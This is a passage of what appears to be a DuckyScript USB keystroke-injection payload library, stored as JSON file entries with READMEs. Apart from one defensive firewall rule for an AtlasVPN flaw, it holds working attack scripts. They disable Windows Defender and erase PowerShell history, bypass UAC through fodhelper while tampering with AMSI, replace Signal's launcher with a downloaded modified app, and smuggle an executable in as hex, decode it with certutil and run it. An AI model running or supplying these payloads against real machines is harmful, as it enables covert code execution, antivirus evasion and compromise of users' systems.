Specifically, in the case of the AtlasVPN client, it is relevant to note that it opens an API service on localhost at port 8076 without any form of authentication. This lack of authentication allows, based on this specific detail, full access not only to any programs running on the computer but also (and this is the most concerning aspect) to any website making appropriate requests. This is an extremely serious vulnerability that exposes the user significantly. Therefore, waiting for a patch is not acceptable, and it is essential to take prompt action, even independently, perhaps using this payload.\n\nThis \"home-made\" solution involves partially closing port 8076, specifically by disabling the ability to establish new incoming connections through the same port. It is important to note that there are various attack strategies that could potentially bypass this protection, but at least a basic level of security is applied, which is not present by default. It is crucial to understand that this solution does not completely resolve the vulnerability but rather reduces the risk of being targeted by attacks based on it.\n\n### Administrative Privileges\n\nTo apply this homemade patch, you will need to set up a Firewall rule, and therefore, you must have knowledge of the password to acquire administrator or root permissions.\n\n### Set the rule\n\nThe Firewall rule that will be set will aim to block all connections that try to create a new connection on port 8076.\n\n`sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP`\n\n**sudo**: The command is run with administrator or root privileges to allow configuration of firewall rules.\n\n**iptables**: This is the command for configuring the firewall iptables.\n\n**-A INPUT**: This indicates that the rule will be added to the input chain, which handles incoming traffic.\n\n**-p tcp**: This specifies that the rule applies only to TCP traffic.\n\n**--dport 8076**: Specifies that the rule applies to traffic destined for port 8076.\n\n**-m state --state NEW**: Uses the \"state\" form to specify that the rule applies only to new incoming connections (\"NEW\" state).\n\n**-j DROP**: Indicates that the action to be taken for matches to this rule is \"DROP,\" i.e., rejecting or blocking the connection.\n\n### See the rule\n\nIf you want to see the rule you can use the command `iptables -S` with `grep \"8076\"`.\n\n`sudo iptables -S | grep \"8076\"`\n\n### Remove the rule\n\nOne of the ways to delete iptables rules is by rule specification. To do so, you can run the iptables command with the -D option followed by the rule specification.\n\n`sudo iptables -D INPUT -p tcp --dport 8076 -m state --state NEW -j DROP`\n\n![](1.png)\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt", "content": "REM ############################################################\nREM # #\nREM # Title : Defend yourself against AtlasVPN Bug-Door #\nREM # Author : Aleff #\nREM # Version : 1.0 #\nREM # Category : Execution #\nREM # Target : Linux #\nREM # #\nREM ############################################################\n\nREM Requirements:\nREM - Administrator Permission\nREM - AtlasVPN installed\n\nREM Define the sudo user password\nDEFINE #SUDO-PWS example\n\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\n\nREM Add the rule and close the shell\nSTRINGLN sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP; exit;\n\nREM Add the rule and display it\nREM STRINGLN sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP; sudo iptables -S | grep \"8076\";\n\nREM Remove the rule\nREM STRINGLN sudo iptables -D INPUT -p tcp --dport 8076 -m state --state NEW -j DROP\n\nDELAY 500\nSTRINGLN #SUDO-PWS\n" }, { "path": "payloads/library/execution/Delete_A_Reminder_On_An_iPhone/README.md", "content": "# Delete A Reminder On An iPhone\n\nThis script can be used to delete a reminder really fast using an iPhone, so iOS system.\n\nOpen search bar, then open the Reminder app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it.\n\n**Category**: Execution\n\n## Dependencies\n\n* The phone must be unlocked\n\n## Test\n\n- iPhone 14\n- iOS 16.4.1\n\n## Settings\n\n- You need to change the name of the application according to the language you have on your phone.\n\n ```DuckyScript\n [21] DEFINE #REMINDER-APP-NAME example\n ```\n\n- You should know the reminder name that you want to delete\n\n```DuckyScript\n [23] DEFINE #REMINDER-NAME example\n```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/execution/Delete_A_Reminder_On_An_iPhone/payload.txt", "content": "REM_BLOCK\n###################################################\n# #\n# Title : Delete A Reminder On An iPhone #\n# Author : Aleff #\n# Version : 1.0 #\n# Category : Execution #\n# Target : iPhone #\n# #\n###################################################\nEND_REM\n\nREM Requirements:\nREM - The phone must be unlocked\n\nREM Tested on:\nREM - iPhone 14\nREM - iOS 16.4.1\n\nREM You need to change the name of the application according to the language you have on your phone.\nDEFINE #REMINDER-APP-NAME example\nREM You should know the reminder name that you want to delete\nDEFINE #REMINDER-NAME example\n\nDELAY 500\nGUI SPACE\nDELAY 300\nSTRINGLN #REMINDER-APP-NAME\nDELAY 2000\nGUI f\nDELAY 1000\nSTRING #REMINDER-NAME\nDELAY 500\nTAB\nDELAY 500\nGUI a\nBACKSPACE\nDELAY 500\nENTER\nDELAY 500\nGUI h\n" }, { "path": "payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt", "content": "REM Disable Windows Defender\nREM VERSION 1.0\nREM Author HackingMark\nREM Disables Tampering Protection and Kills Windows Defender on Win 22H2\nREM Tested on German Computers\nREM Uncomment DISABLE_WINDOWS_DEFENDER() or RESTORE() at the end to use it within the Extension or call it later in your Payload.\n \n \nREM Attack Commands for disabling RTP and Defender with (T)/without(F) clearing or (R) Restore\nDEFINE ATTACK_F Set-MpPreference -DisableRealtimeMonitoring $true; New-ItemProperty -Path \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; exit;\nDEFINE ATTACK_T Set-MpPreference -DisableRealtimeMonitoring $true; New-ItemProperty -Path \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit;\nDEFINE ATTACK_R Set-MpPreference -DisableRealtimeMonitoring $false; New-ItemProperty -Path \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 0 -PropertyType DWORD -Force; exit;\nDEFINE ATTACK_RC Set-MpPreference -DisableRealtimeMonitoring $false; New-ItemProperty -Path \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 0 -PropertyType DWORD -Force; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit;\n\nREM Change the Term for \"Windows-Securitycenter\" for your Target Language here:\nDEFINE TERM_WIN_SEC_CENTER Windows-Sicherheit\nREM CLEAN = TRUE deletes PS History, set to FALSE to run Payload without deleting History\nVAR $clean = TRUE\n\nATTACKMODE HID\nDELAY 2000\nFUNCTION DISABLE_WINDOWS_DEFENDER()\n GUI s\n DELAY 500\n STRINGLN TERM_WIN_SEC_CENTER\n DELAY 500\n ENTER\n TAB\n TAB\n TAB\n TAB\n ENTER\n DELAY 500\n TAB\n TAB\n TAB\n TAB\n SPACE\n DELAY 500\n ALT j\n DELAY 500\n ALT F4\n DELAY 1500\n GUI x\n DELAY 100\n STRING a\n DELAY 500\n ALT j\n DELAY 500\n IF ($clean == TRUE) THEN\n STRINGLN ATTACK_T\n ELSE \n STRINGLN ATTACK_F\n END_IF\n\nEND_FUNCTION\n\nFUNCTION RESTORE()\n GUI x\n DELAY 100\n STRING a\n DELAY 500\n ALT j\n DELAY 500\n IF ($clean == TRUE) THEN\n STRINGLN ATTACK_RC\n ELSE \n STRINGLN ATTACK_R\n END_IF\nEND_FUNCTION\n\nREM Uncomment the Mode you want to use:\nREM DISABLE_WINDOWS_DEFENDER()\nREM RESTORE()\n\n\n" }, { "path": "payloads/library/execution/DuckyHelper/DuckyHelper.txt", "content": "REM DuckyHelper\nREM Version 1.0\nREM OS: Windows 10 \nREM Author: 0i41E\n\nREM UAC bypass for privilege escalation (Method FodHelper)\nREM AV will notify, but payload will still be executed\nREM Payload configured in line 19 & 21 (cmd.exe) : $P=\"cmd.exe /c powershell New-Item 'HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD]\n\nDELAY 1500\nGUI r\nDELAY 500\nSTRING powershell -NoP -NonI -WindowStyle hidden -Exec Bypass\nDELAY 250\nENTER\n\nDELAY 200\nSTRING $P=\"cmd.exe /c powershell New-Item 'HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Fo\nDELAY 100\nSTRING rce; Remove-Item -Path 'HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.e\nDELAY 100\nSTRING xe\";Start-Sleep 1;New-Item \"HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\" -Force;;New-ItemProperty -Path \"HKC\nDELAY 100\nSTRING U:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force;Set-ItemProperty -Path \"H\nDELAY 100\nSTRING KCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\" -Name \"(default)\" -Value $P -Force;Start-Process \"C:\\Windows\\Sys\nDELAY 100\nSTRING tem32\\fodhelper.exe\" -WindowStyle Hidden;Start-Sleep 3\nDELAY 100\nENTER\n\nDELAY 5000\nGUI r\nDELAY 500\nSTRING powershell -NoP -NonI -Exec Bypass\nDELAY 250\nENTER\n\nDELAY 200\nSTRING Remove-Item \"HKCU:\\Software\\Classes\\ms-settings\\\" -Recurse -Force\nDELAY 100\nENTER\n\nDELAY 300\nSTRING exit\nDELAY 100\nENTER\n" }, { "path": "payloads/library/execution/Edit_A_Reminder_On_An_iPhone/README.md", "content": "# Edit A Reminder On An iPhone\n\nThis script can be used to change a reminder name really fast using an iPhone, so iOS system.\n\nOpen search bar, then open the REMINDER app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it.\n\n**Category**: Execution\n\n## Dependencies\n\n* The phone must be unlocked\n\n## Test\n\n- iPhone 14\n- iOS 16.4.1\n\n## Settings\n\n- You need to change the name of the application according to the language you have on your phone.\n\n ```DuckyScript\n [21] DEFINE #REMINDER-APP-NAME\n ```\n\n- You should know the old name of the reminder that you want to change\n\n```DuckyScript\n [23] DEFINE #OLD-REMINDER-NAME example\n```\n\n- Here you should set the new reminder name\n\n```DuckyScript\n [25] DEFIN #NEW-REMINDER-NAME example\n```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Edit_A_Reminder_On_An_iPhone/payload.txt", "content": "REM_BLOCK\n#################################################\n# #\n# Title : Edit A Reminder On An iPhone #\n# Author : Aleff #\n# Version : 1.0 #\n# Category : Execution #\n# Target : iPhone #\n# #\n#################################################\nEND_REM\n\nREM Requirements:\nREM - The phone must be unlocked\n\nREM Tested on:\nREM - iPhone 14\nREM - iOS 16.4.1\n\nREM You need to change the name of the application according to the language you have on your phone.\nDEFINE #REMINDER-APP-NAME example\nREM You should know the old name of the reminder that you want to change\nDEFINE #OLD-REMINDER-NAME example\nREM Here you should set the new reminder name\nDEFIN #NEW-REMINDER-NAME example\n\nDELAY 500\nGUI SPACE\nDELAY 300\nSTRINGLN #REMINDER-APP-NAME\nDELAY 2000\nGUI f\nDELAY 1000\nSTRING #OLD-REMINDER-NAME\nDELAY 500\nTAB\nDELAY 500\nGUI a\nBACKSPACE\nSTRINGLN #NEW-REMINDER-NAME\nDELAY 500\nGUI h\n" }, { "path": "payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md", "content": "# Edit The Default Real App With An Arbitrary\n\nA script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.\n\n**Category**: Execution\n\n## Description\n\nA script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.\n\nThe script will download the zip archive in wich you should have the modified application, then unzip the archive and remove the original zip, then replace the original desktop file with the one that is present on the archive.\n\n## Getting Started\n\n### Dependencies\n\n* sudo permissions\n* Internet Connection\n* Original application installed \n\n### Settings\n\n- Set the link from which to download the zipper archive\n```DuckyScript\nDEFINE ARBITRARY_APP_LINK example\n```\n\n- You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal\n```DuckyScript\nDEFINE PATH_TO_DESKTOP_FILE example/path\n```\n\n- You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop\n```DuckyScript\nDEFINE ORIGINAL_DESKTOP_FILE_NAME example\n```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]arbitrary_file.desktop", "content": "[Desktop Entry]\nName=Signal\nExec=~/.arbitrary/bin/signal-desktop --no-sandbox %U\nTerminal=false\nType=Application\nIcon=signal-desktop\nStartupWMClass=Signal\nComment=Private messaging from your desktop\nMimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;\nCategories=Network;InstantMessaging;Chat;" }, { "path": "payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]original_desktop_file.desktop", "content": "[Desktop Entry]\nName=Signal\nExec=/opt/Signal/signal-desktop --no-sandbox %U\nTerminal=false\nType=Application\nIcon=signal-desktop\nStartupWMClass=Signal\nComment=Private messaging from your desktop\nMimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;\nCategories=Network;InstantMessaging;Chat;" }, { "path": "payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt", "content": "\nREM ################################################################\nREM # |\nREM # Title : Edit The Default Real App With An Arbitrary |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : GNU/Linux (Debian based tested) |\nREM # |\nREM ################################################################\n\n\nREM Requirements:\nREM - sudo permissions\nREM - Internet connection\nREM - Executable app\nREM - '.desktop' file\n\n\nREM Note:\nREM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it\n\n\nREM Set the link from wich will be downloaded the zip archive\nDEFINE ARBITRARY_APP_LINK example\n\nREM You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal\nDEFINE PATH_TO_DESKTOP_FILE example/path\n\nREM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop\nDEFINE ORIGINAL_DESKTOP_FILE_NAME example\n\nREM sudo permissions needed\nDEFINE SUDO example\n\n\nREM Open a shell\nDELAY 2000\nCTRL-ALT t\nDELAY 1000\n\nSTRING curl -o ./arbitrary.zip \"\nSTRING ARBITRARY_APP_LINK\nSTRINGLN \"\nREM Depends*\nDELAY 5000\n\nSTRINGLN unzip ./arbitrary.zip -d ./.arbitrary\nREM Depends*\nDELAY 2000\nSTRINGLN rm ./arbitrary.zip\nDELAY 1000\n\nSTRING sudo mv ./.arbitrary/\nSTRING PATH_TO_DESKTOP_FILE\nSTRING /usr/share/applications/\nSTRING ORIGINAL_DESKTOP_FILE_NAME\nENTER\nDELAY 1000\nSTRING SUDO\nENTER\nDELAY 4000\nALT f4\n" }, { "path": "payloads/library/execution/ExploitingAnExecutableFile/README.md", "content": "# Exploiting An Executable File - Linux ✅\n\nPlug-And-Play ❤️\n\nA script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.\n\n**Category**: Execution\n\n## Description\n\nA script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.\n\n**Remember that any execution that is not permitted is not legitimate**.\n\n## Getting Started\n\n### Dependencies\n\n* Linux system\n\n### Settings\n\n* You can edit the content that you want to put into the executable file.\n\n```Shell\n# You can put whatever you want into the executable file\necho \"/bin/sh\" > \"$file\"\n```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/ExploitingAnExecutableFile/payload.txt", "content": "\nREM ################################################\nREM # |\nREM # Title : Exploiting An Executable File |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Linux |\nREM # |\nREM ################################################\n\nREM Requirements:\nREM - Nothing, it is Plug-And-Play but you can change it as you want.\n\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\n\n\nREM #### Script ####\n\n\nSTRINGLN\n function search_file {\n for file in \"$1\"/*; do\n if [[ -d \"$file\" ]]; then\n search_file \"$file\";\n elif [[ -f \"$file\" && -r \"$file\" && -w \"$file\" && -x \"$file\" ]]; then\n echo \"File Found: $file\";\n # You can put whatever you want into the executable file\n # echo \"/bin/sh\" > \"$file\"\n fi\n done\n }\n USER=$(whoami);\n # You can choose whatever folder you want, the script is recursive.\n DIR=/home/$USER/Documents;\n search_file \"$DIR\";\nEND_STRING\nENTER" }, { "path": "payloads/library/execution/ExploitingAnExecutableFile/script.sh", "content": "#!/bin/bash\n\nfunction search_file {\n for file in \"$1\"/*; do\n if [[ -d \"$file\" ]]; then\n search_file \"$file\"\n elif [[ -f \"$file\" && -r \"$file\" && -w \"$file\" && -x \"$file\" ]]; then\n echo \"File Found: $file\"\n # You can put whatever you want into the executable file\n # echo \"/bin/sh\" > \"$file\"\n fi\n done\n}\n\nUSER=$(whoami)\n\n# You can choose whatever folder you want, the script is recursive.\nDIR=/home/$USER/Documents\nsearch_file \"$DIR\"\n" }, { "path": "payloads/library/execution/Follow_Someone_On_Instagram/README.md", "content": "# Follow someone on Instagram\n\nThis script can be used to prank friends by having them follow an Instagram account or it can be used by yourself to speed up this process.\n\nOpen a PowerShell, start a process trough the default browser that go to an instagram link like this one `https://www.instagram.com/alessandro_greco_aka_aleff/` closing the PowerShell. Then use some TABs to go to Follow button and then close the browser.\n\n**Category**: Execution\n\n## Note\n\nTested on:\n- Windows 11 Eng\n- Firefox Browser Eng\n\n## Dependencies\n\n* Internet Connection\n* Instagram account logged in\n\n## Settings\n\n- You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/\n\n `[18] DEFINE #INSTAGRAM_LINK example`\n\n- It depends by the computer power and by the internet connection power\n\n `[72] DELAY 2000`\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/execution/Follow_Someone_On_Instagram/payload.txt", "content": "REM_BLOCK\n################################################\n# #\n# Title : Follow someone on Instagram #\n# Author : Aleff #\n# Version : 1.0 #\n# Category : Execution #\n# Target : Windows 10/11 #\n# #\n################################################\nEND_REM\n\nREM Requirements:\nREM - Internet Connection\nREM - Instagram account logged in\n\nREM You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/\nDEFINE #INSTAGRAM_LINK example\n\n\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\n\nGUI r\nDELAY 500\nSTRINGLN powershell\nDELAY 2000\n\nSTRINGLN Start-Process \"#INSTAGRAM_LINK\"; exit;\nREM It depends by the computer power and by the internet connection power\nDELAY 2000\n\nREM Go to Follow button and click it\nREPEAT 12 TAB\nDELAY 500\nENTER\nDELAY 1000\n\nREM Close the Browser\nALT F4\n" }, { "path": "payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md", "content": "# Install And Run Any Arbitrary Executable - No Internet And Root Needed\n\nThrough this guide you will be able to create executable programs that can be installed via DuckyScript in such a way as to avoid using the Internet altogether. This type of installation can lead to serious damage to machines so do it only if you are fully aware and sure of what you are doing, in this example you will already find the code in hexadecimal but if you want to be sure recompile the executable following the following guide.\n\nExecutables have been removed for security reasons.\n\n**Category**: Execution\n\n# Guide to Creating an Executable Program using Python\n\n## Introduction\n\nThis guide provides detailed instructions on how to use Python to create an executable program, generate hexadecimal code, and automate the execution of the application trough DuckyScript. Practical example in assets directory.\n\n## Creating the Python Program\n\nTo begin, create a Python program that performs the desired functionality. You can use any programming language of your choice, but for this guide, we'll be using Python.\n\n```python\nimport ctypes\n\nctypes.windll.user32.MessageBoxW(None, \"Hello Hak5!\", 'Info', 0x10 | 0x1)\n```\n\n## Creating the Executable using PyInstaller\n\nOnce the Python program is ready, we can use PyInstaller to create an executable file. PyInstaller converts the Python program into a standalone executable that can be run on any compatible system without requiring Python to be installed.\n\nInstall PyInstaller using the following command:\n\n```powershell\npip install pyinstaller\n```\n\nTo create the executable, run the following command in the terminal:\n\n```powershell\npyinstaller --onefile full/path/to/the/file/example.py\n```\n\nReplace `example.py` with the filename of your Python script. The `--onefile` flag ensures that the output is a single executable file. Remember that the executable file can be found within the path `dist/example.exe`.\n\n## Generating Hexadecimal Code\n\nNext, we'll generate the hexadecimal code from the executable file. This step is necessary if you intend to automate the execution of the program.\n\nTo generate the `hexadecimal` code, you can use various methods or libraries. In this case I decided to create another program in Python capable of doing this conversion, the partial code is as follows but you can find the entire file in the assets folder.\n\n```python\n# Rest of the code...\nwith open(filename, 'rb') as file:\n binary_data = file.read()\n hex_code = binascii.hexlify(binary_data).decode()\n# ...\n```\n\n## Creating a DuckyScript to Automate Execution\n\nTo create the payload in DuckyScript you simply add the hexadecimal code inside a STRING command immediately after opening the notepad.\n\n```duckyscript\nDEFINE #HEX_CODE \n\nDELAY 500\nGUI r\nDELAY 500\nSTRING notepad.exe\nENTER\nDELAY 500\nSTRING #HEX_CODE\n\nDELAY 2000\nALT F\nDELAY 1000\nSTRING S\nDELAY 1000\nALTSTRING \"%TEMP%\\script.hex\"\n```\n\nReplace `` with the actual hexadecimal code generated in the previous step. I used a combo ALT F and STRING S for save the file using `\"%TEMP%\\script.hex\"` that save it in a `TEMP` directory\n\n## Decoding Hexadecimal Code and Executing the Program\nNow, we need to decode the hexadecimal code and execute the program. We can use the `certutil` command to accomplish this.\n\nOnce saved the file with a hex extension, run the following command in the Command Prompt:\n\n```powershell\ncertutil -f -decodeHex \"%TEMP%\\script.hex\" \"%TEMP%\\script.exe\"\n```\n\nReplace `script.exe` with the desired output filename for the decoded program.\n\nFinally, run the executable on the computer, or any other compatible device, to open start execution of the program.\n\nThese are the steps required to create an executable program with Python, generate the hexadecimal code, and automate its execution. Feel free to modify the instructions to suit your specific needs or programming language preferences.\n\nHappy Hacking!\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Instagram\n 		\n \n \n \n
Discord\n
\n
\n" }, { "path": "payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/README.md", "content": "# Example\n\nExecutables have been removed for security reasons.\n\n## File list\n\n- Python code: `example.py`\n- Convert to hex script: `convert_to_hex.py`\n- Executable file compiled using pyinstaller: `dist/example.exe`\n- Hexadecimal code output: `example.hex`\n- File compiled from hex code using certutil: `example.exe`\n\n## Procedure\n\n- This Python code create a Windows popup.\n\n```python\nimport ctypes\n\nctypes.windll.user32.MessageBoxW(None, \"Hello Hak5!\", 'Info', 0x10 | 0x1)\n```\n\n- Create the executable\n\n```powershell\npyinstaller --onefile C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.py\n```\n\n- Create the hex code\n\n```python\nimport binascii\n\ndef convert_to_hex(filename, output_file):\n with open(filename, 'rb') as file:\n binary_data = file.read()\n\n hex_code = binascii.hexlify(binary_data).decode()\n\n with open(output_file, 'w') as output:\n output.write(hex_code)\n\n# Esempio di utilizzo\nexe_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'\noutput_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.hex'\nconvert_to_hex(exe_filename, output_filename)\n```\n\n- Create the DuckyScript payload\n\n```duckyscript\nGUI r\nDELAY 1000\nSTRINGLN notepad.exe\nDELAY 2000\nSTRING #HEX_CODE\nDELAY 2000\nALT F\nDELAY 1000\nSTRING S\nDELAY 1000\nSTRINGLN \"%TEMP%\\example.hex\"\nDELAY 1000\nENTER\nDELAY 1000\nALT F4\nDELAY 2000\nGUI r\nDELAY 500\nSTRINGLN certutil -f -decodeHex \"%TEMP%\\example.hex\" \"%TEMP%\\example.exe\"\nDELAY 1000\nENTER\nDELAY 1000\nGUI r\nDELAY 250\nSTRINGLN \"%TEMP%\\pranhex.exe\"\n```" }, { "path": "payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/convert_to_hex.py", "content": "import binascii\n\ndef convert_to_hex(filename, output_file):\n with open(filename, 'rb') as file:\n binary_data = file.read()\n\n hex_code = binascii.hexlify(binary_data).decode()\n\n with open(output_file, 'w') as output:\n output.write(hex_code)\n\n# Esempio di utilizzo\nexe_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'\noutput_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.txt'\nconvert_to_hex(exe_filename, output_filename)\n" }, { "path": "payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/example.hex", "content": "here should be present the hex content\n" }, { "path": "payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/example.py", "content": "import ctypes\n\nctypes.windll.user32.MessageBoxW(None, \"Hello Hak5!\", 'Info', 0x10 | 0x1)" }, { "path": "payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt", "content": "REM ###########################################################################################\nREM # |\nREM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10/11 |\nREM # |\nREM ###########################################################################################\n\n\nREM Requirements:\nREM - Nothing\n\n\nREM Define here your hexadecimal code\nDEFINE #HEX_CODE example\n\n\nREM Note:\nREM - Tested on Windows 11\nREM - Running checked but not blocked by Avast antivirus\n\n\nGUI r\nDELAY 1000\nSTRINGLN notepad.exe\nDELAY 2000\nSTRING #HEX_CODE\nDELAY 2000\nALT F\nDELAY 1000\nSTRING S\nDELAY 1000\nSTRINGLN \"%TEMP%\\example.hex\"\nDELAY 1000\nENTER\nDELAY 1000\nALT F4\nDELAY 2000\nGUI r\nDELAY 500\nSTRINGLN certutil -f -decodeHex \"%TEMP%\\example.hex\" \"%TEMP%\\example.exe\"\nDELAY 1000\nENTER\nDELAY 1000\nGUI r\nDELAY 250\nSTRINGLN \"%TEMP%\\example.exe\"\n" }, { "path": "payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/README.md", "content": "# Install Any Arbitrary VSCode Extension\n\nThis DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:\n\n1. Removes any pre-existing version of the extension (if applicable).\n2. Downloads a ZIP archive of a VSCode extension.\n3. Extracts the extension to the correct VSCode extensions folder.\n\nThe script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.\n\n## First Of All!\n\nInstalling Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.\n\nSo...\n- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.\n- Always check the source and source code before doing this\n- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.\n\n## Features\n\n- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.\n- Installs a VSCode extension by 